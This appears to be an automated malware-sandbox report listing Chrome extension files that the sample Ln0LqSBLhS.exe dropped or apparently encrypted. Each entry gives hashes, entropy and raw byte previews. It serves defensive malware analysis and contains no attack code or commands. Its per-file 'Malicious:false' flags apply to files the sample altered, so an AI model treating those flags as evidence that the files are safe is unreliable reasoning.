                                                                                                                                                                                                    Preview: S.<...[.G..:E.N(....Q..E.2..q"...._..}j.=DN4...-u.....i..G...v.j....`.7..W.$|-..Q..2d~.JE"......A...|.u8>.v><....R........u..yd..........R.....+..se.M..d_..}.0.L.e..?.Gh8-..4W..R.98..N.......17M....=h....%/v.....|..y+..`.x.ra.!..k.....y..@|.X"T...........B.n.X.w/.F..[.)M@'..]...E......sV.+.,.\3...]....u.....?>......,.:+.tb..8.v.V..C..i....xm...g.. ..F..t.y..gs.y.<.n.>Z.m*V.@..r...ae..az5'.yf.D4.b.#..O..&#..TQR.l...!.(t.M.-8R#..i>.zAv..KN:.LX...e!w......1E......I...Zl...0}.o.7#.P....v..c.]|.5r.....%$.i..>..h.Z.D...7q..Qb.NQ..R".e.J.dA......9......N8d.7....W..1p.....-..*.... ..$........l0E.v.../M.sv.....1.o.c.......T.....A....!.bZo..]r..M.'2!y.#..f.M..V..w!Pb$...`L}...N{n0$...*..mL;..K...&v.6.u.5D~........b]F>..Q..K9...nc...1..t!>7el..`.P>.h........SV}T....\..-j...m~...F1..;BB"...]..U/....-\...,..%.....]..:^v..6Ql..YI~...i...$ik.*X..=Z..\..r....[.....\...?K.L..l.[.d..G.E..hC.....8.'k...B.M..X.;.0.E.K...<+...2.."..|b..eZ.yR-...h.4X.k.y=.%.../
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3734
                                                                                                                                                                                                    Entropy (8bit):7.951395247380839
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:L0G2iaO/QHxGF5+3PvtkfmdEDoZp8og/dN7tUgcCfDayZ8:L0GAgg9kfmdE8ZzWN7mCfGc8
                                                                                                                                                                                                    MD5:BE66AE994F427199F33830AB930A66EB
                                                                                                                                                                                                    SHA1:A36F52B5DB7E96870440C1E8C82DDACC6376DCD8
                                                                                                                                                                                                    SHA-256:515E766B83FF853883C7874CE24123EC4A95726BFDD73253BC031E5A91DE714A
                                                                                                                                                                                                    SHA-512:FFF70F84E618552CC8E298F8954EFE05132EC7BC45FFB73A50DC9CD37A49E2073AF0D9302D98F1B95C497DED6F18A507288C1DF1CCDBD3E8CAD6D288CD5E322F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .J.*4..G".f.......X...f....8......`.I'....b.......a...p".........N..f`..<(..]%..v..o..G.P..Gr...<s(M.h1....40......t...E:.a;>.}.8.......a.s.MJ.p}!.w.z..O. ........q.<.~.T.....=dg..R.J........D.d.rTtvC.aa.g.....e.`.w.6...g..O.+T....KeI&....4.o.v:.g........'{......H|.,...).{.i...'.....Pu..."...u./.@R.P...{...;>.?v.%.i....-....O.7.I=.5V..*"..Ue..X..5.q...l..d1QV..D... 6...G.0.%..'d(....lx.. >..+..l......@....,G...E.g.P.;8...}.:i.......uG.bpA...R.w..p*.:.nx..@c...K.4J.....u.F.....A\j..|..C.{v..M...tW..l.A,,1.$..,.;8'h/.D....n..P.,..l.a.q~...E!o.nY.~..u...i..C....7....m.............6/W.k..PDW.9......%..yd.O....m..S...!.I..}....E...c1.A....q.[...*..K; ..J;:O~.S..CCN..G.r...G.T.q`...y/o....z..d?m-f....L=...f.9.....J..Ii.dQ.1......o..>.n.M.Q.....'......L... ,.gN.:...XcI...S@..AE.*o.U.@/...u.L......G7.6.....W..9......s.o>.q.OU...^....rs.i.3....x......gj!F.g.`.........7|Gr...!4M.|.'...l.".....JV..E.\4..9...6G.-..\K.......s..C..]...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6525
                                                                                                                                                                                                    Entropy (8bit):7.974623134243233
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:3MOPk56eSLqCcLV8pxHboR16n8fFB7gHYtY1u3bvO:3Xv1LU8Hb+tgaBO
                                                                                                                                                                                                    MD5:0ACA8106C326AC39F94195149A0D636D
                                                                                                                                                                                                    SHA1:0F4D00D0235F5D0E604484740AE25913074977C7
                                                                                                                                                                                                    SHA-256:4E77613DB9B4CB63C69FB74E5D45782B1C051719BDF4F5F7F0B729A6AC2465B3
                                                                                                                                                                                                    SHA-512:AC9B69FEA83BD9B5FA6F36632370FFAD8F2C0BD30BCF0B8B72FD7F20A7BDA82596EDE62A2D2BF7F6E55433A77A1AC1D5CDBC1A2B8FF2808A8DD07C776AFB5C4D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Z....Z..'R...R.,..>..8....H^..u. .........-`7..+......n....4;...8...A...C.va...3...fC.b'..q&.T.09.;.j.dO...........r!E..t..9>.d.....G6.....2,!....H..s.n..w.r..$......Tx}KZ]..G!....5.DB..F........PC.IL....Y.$...N;"..d@9.6n....F.F^.4lGm....B{i<......W.Y...l0...yK*..{....5..=N..}..9...h.:R=:.J..(X.tv..2.%v.n9..4@.VU........ .HO.H..c......5V..n.H....(d...5_...`.....>?z.*....b.p..W...Y...^...N.h.{..4..........1k..A.=,~a..7=Bm.LMp./#.V&|.*..8.i.....h.b.k.a..J........a........z....v...-.`#.Y{..e..Zg\..]V...O.~..L.H@....."....Z...Dm.;.O."ln..w/C.Q.OV.g.....vk._.........?"i*..~6..`Z..3w.i.w.......o.*$M.#P...8..Ii...`..B+)..18.!.1?.G..).(?&..aK.B..^6..P..sr. ...O..F...e..."W..(K....F1rv....k0...#r>.Z.b.....y6.K.J._.IpW.0..H.".a..W.......$7/....M..N.t..Q..=.x.g..nSM0.(j.8.}.|..3.-...Y..n+!.......F_.5...I!u-9..I.7t.v..A.oJ.$.o..<.m>..H..[d....s....p.8...M..wF.w.Z.YT4O.............1...Bs...+...#.,.@.......3..T(.t...........vG......V.0..y.~..H!.c..,A
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1057
                                                                                                                                                                                                    Entropy (8bit):7.741899079493258
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:85spWVpm/GhFphUIr391wMpHGuxQrAYbnz027g7bD:850WVpIGt391wMpmu057MD
                                                                                                                                                                                                    MD5:250744BD02B3A571B4CFAFB3D6390059
                                                                                                                                                                                                    SHA1:BAA8F40006182C8F8882FB1367DBAAD7DBA59861
                                                                                                                                                                                                    SHA-256:5086DA608B49B4946C12A577FE4152CE687EE6DE8E3C2CB9AD24FF905BD54BB4
                                                                                                                                                                                                    SHA-512:7CE95CDC22A5FB42BF6D80297C8550FD4166A08360BAE42B8E88CDDBFD392B83A2B3F201A060ECDE52764557EE73B4B2F3E25640FD36A71516159ECA04581BCB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .a.W.).....)Q..Q/P...T.....#...^.c.G.......#$.8..3..`{i6..Wd..2..U."/'S..DB.R......i..q7...\..]..w{..S..w2!{..GtUk.H.^.+.1[``:.X..*.G.~.w..6?.cK.V....h.ohc..O..H......BY4D<T..jr.9.+....%f.i.r.\n..].......STA.U..W.(..a-a*Q..R..)t.j....X.7(.]..r%|.%a<.h6....NE...w.1a;..2..<..k~.?..c.7..(..4...2.G..A.lJ@...........3.2e...}...Q,9.5..7K.[~x......YX...4^...$.c=y..#.<..l..%..O....x........hkB.lcTi.Q.o.......;........"..p.]...9..0.].Y.4..^md.v..c..W..*.[,N.n.,j... .5}....4...o3../4. B'.p.....x)s..>"..e^.>!...T....=.P.....*..=......-;....$*....5......@..j<.H.<.U.1..k..o.[.3.......]....qr['......X.P...0.6....q.,.....}%..-w..>.gh..8A;.K<.B......k._$bM...!......Y?..j..P.^T..T......"...2.^^.P....L.~67G..t.Z......_..."..|F"......S....0;.0...Vx.6...r#.c...3...;.m.Q....K...V........42..*..H/.a.O....?~...`.]3.^.&x.)...@eq).........w.....MZ..wwP.t_ua^rUL.l3.....)gAt.?....+q'?4..,..b.O...N..........^C0../...).!B..cY9t.....jL.....5VPEIoxEWaaB5A242LGR5
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_metadata\computed_hashes.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):681
                                                                                                                                                                                                    Entropy (8bit):7.641117502819769
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:wNy1GmqvaEPtrT8qDFoCfsjqMsIFrV26KEA8uekb7VtKfKWPBXLpI050jbq/4ehH:S7trT61WDIFrrHhWbBuJLV0jbq/4WbD
                                                                                                                                                                                                    MD5:D0A8F3AFC9A9CEF40FB6D871892C7A4D
                                                                                                                                                                                                    SHA1:EE39AEE22B12E7B5039AB65C0004705B00589FB0
                                                                                                                                                                                                    SHA-256:7DA7B809C5F723861E9019ED6DCBFC20505565B4624418A5566DE68AB8BFE522
                                                                                                                                                                                                    SHA-512:EDC92D157B4277DD3782436042F5F3D22C2B60DC1D7809FF58AC83F0B942C732EBC2F6401C13F31969A099A2D5158EEF53F6F7A69ECD112CF59DD9461CA3C97A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: sQl3...P ..e.5......,..A.!q....k....f..Ih.%.....V'..b..3...)...S`......t.....\..,..&....{....`(.'..v.....s.....D..../e.....vO.....0S...x.*i.1......0......'.}m..!...d.).r.cra.W.Ps...9..HH:4.C_.m....xo59h....>\b..K.*I.\.Ami.....f..\7..8........U..g...Fs..+...m%.gn.vxpK...)>....o~*e............Js.Q...X.0.s.,.%.q.....d.>./.(.%[$..5.....o.R.........y.........n...^86..b.........}.A....[q....2..N.c.....s..E..]]<.mod.t<.;{p.\*./.:...'8D..6U...&|..9.+......r.@..c.D......x<...n...i/...]..].pq.n..}Tl.Y..,..n..RX..N.......`....}....|..0....g......G.A.K.f.W...z......>J.k.05VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7238
                                                                                                                                                                                                    Entropy (8bit):7.971568800049715
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:DXhOJrsm70/LKVhqe9bQD08sPwsecpN4EU4oKVjE6dX9CnuS:0o/2fqe90D0XecX4ERoKh1dX9CV
                                                                                                                                                                                                    MD5:7E929DC6FC766755DEA7C405A3E87495
                                                                                                                                                                                                    SHA1:E3DFB82180DEE2B6CA037FDA2879983752000463
                                                                                                                                                                                                    SHA-256:8B6DA948A63D317BE35808B11140C4671E01355CE558F8599437166AD7202435
                                                                                                                                                                                                    SHA-512:401D7AA25BD568B3680FFA470334D5A239BD06CF19B6420F9DE629A58B039099A034CC4DF546BB8508E22F00FF3AAF8B7AF34AF086CD56DA98F7773278CC2551
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: L6O.."..bJ.{...^..W.M.....3C.&....[{.I.q...n.#..^t..>s..i.s......\.a....!...<y0...F.1....G.p.K...h[.:..t.bf%`X:.1|.i.".YE..&.N.i....|.@@..mgz....r...kfj..PGG...Z2...o.V.:h.d...s.}....*p.8.6.6/I".8.6...\.B.).....,... ...w....B?.x..T. .W... .n.#.T.2.H&v.DD...Ku.*..l.....a.7f.IG....({$..$....c..0...1y.?+.DT...9........,.5.._....%..t<.m..\...?....>G. .....%.x$...b...Na(.f.XYW8-......s..z.VV.~..L..m...Hc....\.V..^I......=...6.J..l.6..t..L.......9.h6.1p....7..4.P......p?hnW...x..q.M.|.q..Y.M......u..H.Z..ab.u.....%..(....j..8.;..t.....O.W+..7#..N..&.i).>.M6.<.3A...$...uv...Gm..E3:...Um...6H......,^d..k....kTX.kT...}1[...2..8._Ws.%.g.{Q.%l"kh..w...!p...K.JN.Z.D%&...k.Bqs.G.}..I.S....Y.Vu../.qJ..Y.?m...).X...w.D.y..S.E.V..h#.....bw8..So.n$..E.n...:.....L,.8q@.u..,......k..".9#...../..k@.k.&...t.S..o.^<...yM6.*..].?>...eZ;....lqJ.e..05..?.d....#@.\}......J*-.K.{. ...8,p..x.zg3<.......b...Ks.R....7`.Z..6..xtQ......`.P\g..f..2...s...i..\5D.)j.*HWN.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3729
                                                                                                                                                                                                    Entropy (8bit):7.945899388172824
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:/qiX2XZllMvlplYsqC1WVcYjxMd1A/4+JsMgWzFyMAUsf7Dw9:/RWMjlYsqUVm5/LZcMB
                                                                                                                                                                                                    MD5:A58BFCACC7EC3B1846F4D8CCB05E6C2D
                                                                                                                                                                                                    SHA1:9ECD568A4C2EBD20ABD5D19F5A734D5BA58637DD
                                                                                                                                                                                                    SHA-256:8006271C57E8077A7CB4B6E848635FA47271A03D3CC7724087A0D100F0CFB15A
                                                                                                                                                                                                    SHA-512:E616C0C395B7E318AC83FA358CD3C14E9745B565F905A2850228CF8B92EDC80112D0D7C969E463A19D6306353DD26FA6412780CBFFCC5CF55C2D6DCC01BED185
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .L.,...N.N.J..4.."_......5.hSM .+1IR..9..-.-!.U`.x.(.z.<....$t....6..;...:....@.V...|.E.`Z./..t....Wp.VP.......f..e....w.M.<...U....&...+.V.rH._.Uo...+.n.{.La.[%.z7...M....!...W?....]..[.Anca.b..{;l.vq.-.cav......(...M..%7['..A...s.9....i... (....Gz......c....?ac..k=5.9...!BF...}.1d...]...y..c.D.[.[nm..J.o.{.p.....Rh.[3.W..y.!...3.W...<.&!0h{x..B%..4.V-j.......t..r....E'V.MU..O......._!...F~&}..M..h..y..!...Jo[...m.&.Wqn...J&....yD..u'Oc._2~8.....*b.v....f.*._.j...R~; ..--..9.............}.h{. .......XV^.x.y.......B..g.[VI`H J..*n...=X.o&....O.i.5.>.t".9{,.h....'?......V.j..u.;"yWh...?.d...-.kN..nS.XG...I6..c.z.1....lb.:../...w......a. e8'.N..=.14..:.R.&.2.......x..Uz......{......."....o...5.x..c...U....k..M..oZ.a.q...f?..O.n.m.-...p..$..I8........x.."....r\:......c!....J....L&..1r.........NY.ip-..k=.|C...='...1..ah.....l.~..].......DF..:Y:...jN.4>Uc..8q.+..A`\.\l.$..$..}G-.%.0[..V.<..%CN.../I(.eog..G.t".NL....l?4......(
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_16.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):486
                                                                                                                                                                                                    Entropy (8bit):7.453921033017515
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:lhr+UFa7uC/8gH24As6TxJ9aEetZuDDcii9a:j+9uCeJJ/etZuDDbD
                                                                                                                                                                                                    MD5:2F0D281D25E010292167C50FCF112833
                                                                                                                                                                                                    SHA1:9D269C8F2F5914CC26E09CC241CE7103393A3A4E
                                                                                                                                                                                                    SHA-256:4E6E57FC86CE7D4911E50E0836885EF1673BB985178F825258445F8624CEED0B
                                                                                                                                                                                                    SHA-512:7F06EB626FFED62B6B51DF4261020152A830D7BE01A9B09E1AD7A24D83591D8F571019B23F312304C0711E2846D17DE776ED3B8886D29952BC2971C816535C6F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: D<...|..u...zQt..hj..(3b..Ez../!.<!M/E......<.B....:t..*q ..s....^.rp7..1 ..[..#....o\M........n...l.D.T....0..>..E@..T:2t....w..r.-...M!..p.....}.A)c2...r!.]<a.|....kI.S...xG..8.C...[.._=A.......I.u.Z..#.l..../9|.=nn..._...i..R.....z.....+..5..*%..._n.`&.(......-<.W>h...p`Q.4...[.....}M.K..7....s...Y..J"z...&8..}..eS.C!?..F.).rw?...4..=.@M..>ii..-Z7>..[t...:J+!>.).........<[xz...8..%G5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.html
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):421
                                                                                                                                                                                                    Entropy (8bit):7.327467633861927
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:+Iu1MWq0/eA6YhFll5kKwnerNIpkfK3MEyXucii9a:xuC5qllluqNDi3TyebD
                                                                                                                                                                                                    MD5:55281BCE946DFD3D22CFB6069FB34878
                                                                                                                                                                                                    SHA1:E451A2E153F8C8D3FADD8BDE9C1735A572B858C9
                                                                                                                                                                                                    SHA-256:23A2A258D955451264F850404C36CD566DB4A78277D47A7914043C4B2D7DA535
                                                                                                                                                                                                    SHA-512:A71FE262EA8BE59DE7302B2A2A6D000A55066C4E3F112155E15A385ACBAC42F1315213CA39F045D12B50EBD49F348FC94706B4577E87F98FA0A874F500878F47
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....6.c\.o."?".1.M:..C.@..N._.R.@..J.K.tw.%V..?G./......;Er.G.?...`/..S....m..i...k..m.....g..)Z~.YE.o......P.d`..;.>/}.\.p.0....$.5|..n..G..@v(NX.7A#{l.0....6...;.S.j.c.\".40..L...h...3.f..;.B.....2f.X..,..S.,$.6....R+p.......u.Y"g.D:uJ..'...p....ao..9.@..<.dmq..Z.4<Z.?8...m.q..~TK...E.. >.;....>...p..K.D..42DK.E[...w.......l.B...35VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):424
                                                                                                                                                                                                    Entropy (8bit):7.331773492788596
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:v+DgZeiRYaQLEWt62f9mI6IdtRn/cii9a:v+hCYB756eR/bD
                                                                                                                                                                                                    MD5:1BEAD0B615F85997795A88EA4F7BB703
                                                                                                                                                                                                    SHA1:3D083C4403FF066549BC59DD5122D05CC7E9DF55
                                                                                                                                                                                                    SHA-256:E179A101F7745849D31092A5ED9724E2CF79A7CAFC8AE9BEE08AA3473541AEF2
                                                                                                                                                                                                    SHA-512:6E98010AD5171CEE288AFDA86D90FB94A74FB7BE88F9E673EA22249FC2EAC1D8AA9DE560F93C79C2D027E94206CAD4D692E6232CB9452AF24FFD9301EF3C1EC7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: o..n.7.E.}rh.S.j{Y..|...`....k....h.....m&...th.-..O.....!.`..K..4.Ul..L...|...Y...S......3....V.7 ..56-.....J1..C~.G.n3....Z/.... Pd..w...8`..<F..;...._L.8.d..(a.Lf .........S..6Xp<.@e-.e..V..L8.R;.d...."."w..T....%...#$.E;7..q..o,.Z..&f.x.f.9.|2.'...xj..l&..dG...IG..o.0.k=.G..d..^.@.:Q.)".1....4..<..0v....s$.......o..p...b.el.o.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1055
                                                                                                                                                                                                    Entropy (8bit):7.804437952061823
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:tO6e0Znx5C/brT18H63ZUr3Yzg4IX10YgJITF4b7sXhNbD:tc0l/C/X5Svrwg4O2fKR4b7sDD
                                                                                                                                                                                                    MD5:21AD72C103894B84C6E78B9504F046EA
                                                                                                                                                                                                    SHA1:097D367E332A941D8BF394F936E7F1962537BF67
                                                                                                                                                                                                    SHA-256:6BAB121B596026C5C7A9DE44C6A30814092F43E4579B79ADEBF1706D081E7A97
                                                                                                                                                                                                    SHA-512:9F8AD9614286377F873AFC286DFABE54E056641C919629561CDD4D7E853AF93BA4AA123621299C0041CB4FC91E00DE95F5BA2EA34376CA8D393B5CEF07E49CF8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -..|.e.A..h....5L..il..E...F%....4| .+...v..K.*...(...P.1).Z27n..b...!....@~@..F6Q.W....6.(.1-.....d....1.!D.B9u[c.I_......2bf.G..:..h...^n...z....K..Y.z.....T...mH...3A.;...Y..:.4}...f1u..z..v...}.%Op}4&8.......F..N...w.%.C....x..K.'.{.T;...e_(...<......R..==Y../L......{..9.$2.<..D.d...G......N/A./L?..]...."2.q...LRcq.*.W.Z..2#...r~n.&.Y\dJr.i=..d.L..f....j....Oc..xl.O...,`...$p.{.7......%..c.......jx8..A......u..~.x.p.CM..OK_..5....v..".`!..Xi.^S.k......0b*....R......y'.... ...h.....5.`...@....^L.4..w....t.@.L.u......xQ.|...K..w1..7"(..*..T..-l..y..{VF.Oxr....s..9I|....u.~/...t.M...:vi-...<q....E..+..:...&e~}ad...\...s.Q....Z......^dA..;...oR.].q}.....3.^.....3...J.Y..0.tLt.G.....l.=.4...m.6..v.....)v..t.yN..[....(....r.n... K.T._Z.K...?........D.o. }@t.....9.|.r>..FA.Z S8..Z..*.<.........;.4....U.2...c-3[.C........%..$...q.+,.....8..*.F...*g...!.S..$.T.,.c.w.(\=t..R....{p....g......Hv.a.......GD.A#k..X...C.SK.~.h4]h.....]5VPEIoxEWaaB5A242LGR5OT
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5311
                                                                                                                                                                                                    Entropy (8bit):7.963617239338459
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:pK5YvlnK6/h4JmBuSR5uxKdngq/IMxeBZPiBGideuEWywhguO2:cevlnKaamBuk00dgqwMuZm2WyWnO2
                                                                                                                                                                                                    MD5:BD8DBE01A34C80CA3736A707BFB11DD0
                                                                                                                                                                                                    SHA1:46044BA8DB1B41362E51E54DDD1A500E0F84607D
                                                                                                                                                                                                    SHA-256:8DB7047B8D0E52E5631979BC76563009DE00ABE4D1CEEE83D9993CC766039542
                                                                                                                                                                                                    SHA-512:A0B35F23AB5EA3C0BCFDEC4D052775B6DC6BF35CCA54AD9F0DFD44779C283BF70F3C8C058BEF23A126CE8CECBB48828E4CD028F37DAC128E532B4568FEA496D2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .e....@.xY...L..<l6a.Zf.,2.G..E....o.k;..f.M...X6..pB?.L.jG6.D.ls..........k...H.f....~..g.:y......_,.g.L..S`.. .......rx...........u.....?5.Q.t..n=...RY..W|H...c:7'cD.:.).&..4...H..tE/.&...i...ckj..U.....P....8._d..'@.R.o.(.[B..m....!..7.....#.'.Er.'.R4.#R....p...b...OX...4........K~(..2............dh...b......?u.....O..R.....R.z....d.d.....R.:...ds.j..#....7'YX.......b........rL......B...l.....<...E.......(.\.. .-2.cJ.V.-...E..s.....7.T\s..}.........0r..Y%..h>...2.C.1@.o.U.Nq.0qN@..Rj6.b".......~.....?b.a...*:B...I.1;Z...7fSq..3.p..)A..+.g.....>..D......Zu....s5...D...,..`.V{..H.V..=._....A0.z...a...._..g......H}Z...fJ...*.......d.j.iLD.-b......Z[...t...N......p..k.*7...O7|57....!.'?r..h~.`.....f{;..j.d-./e2...#..! .z...a.o...G...A.#.."..1.:#EF.\B......8!/[Z>.N.`u..X..^.*......*...[..^....'.Zv...N....../.KLl..<X.Z.....E.b_2..Q.~..*..v....N.B..4i..{g..T.]PK..:.....[~.D2..3.%.B.~....f#G....^..~B.S".|. .(..B.*q.<.h...:&
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\computed_hashes.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3959
                                                                                                                                                                                                    Entropy (8bit):7.949898668275138
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:YtETHwEQc3jIwCl4tRF85zTPMNqBYVi5tVgyVNVDmAtEbrzX:Y6T1B3jIvl4EzwNiYVi7+yfViAtELX
                                                                                                                                                                                                    MD5:FEAA7F27CFA7D589DC2E44AC738027F3
                                                                                                                                                                                                    SHA1:A7DB3CEA4872E6B661ABF776477860B57DAFA3A8
                                                                                                                                                                                                    SHA-256:5D73956C4806B767CF8F71254C2B9BDE47E8541857984B1D67D089E046D00580
                                                                                                                                                                                                    SHA-512:01D2A85792BA06D466A3A5F2CFEC3B372E56D148CE2E1508018A7640A173B717B4B5C71CABFEEB16F97573AA8102272ABE43026BE60E25382A752799A0CBDB22
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....v.c.t.@.u..=.1............Z.n...Z..m...#*.#.MH..l.I...........Y4.2..A..X..E.......M.,.#...3.JVRz.!..%vJ.S).+....d..t....sX....[+CE.......).(.M...{.....;.SU....o=.)!...U..RcK...k..m.DF.....-..jmF.XkUu.z/.bI..Z...c....;=.N....}.Gy/7_..i..z8...L....9..c/....UAl...q.Pw.{LK../.....&....jT.Z.Ua...K5....`...<e./..[....(hE#.[..Inq.;.S5po..4&.....;..y.!.l.wHv...^.G..q....q.+...s.v..'.ht.Y./.+..st.d............w..c.\..y=u...h.Au]....._.AA...@MS...2.Z..h..a.....(..:..$.uE.B.%y....Q.._.>....N.../.k .\......O..l..~.)...mq.Q...U.7....H....I...~..<..*.&..;...._..-.]..4.0...d..5Y....7:A.oQ.....>..Q.A.u..4..7...5W...H.i....c{......[..-.Dv\.7.|..A......,.dI.. ....E.Fm...p...T..1.........C.._...$*...'t..\..0.G4f}..;z.......o4.cG...P$.4..;.".DH.><.#.R.{..Q.Zp!..:......e..B.jw.... .C|.O..E!...h6$.).R...4...G......Q../1..hI...A\5.....rTC....s7{....t5...-....>.B.$.t...$..o.*U.2.I.U...+.X..Ev.Gj..2.t7l9..Z...7.c..i...R.l..o8...v..#..4..I.l.!.<.}g..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
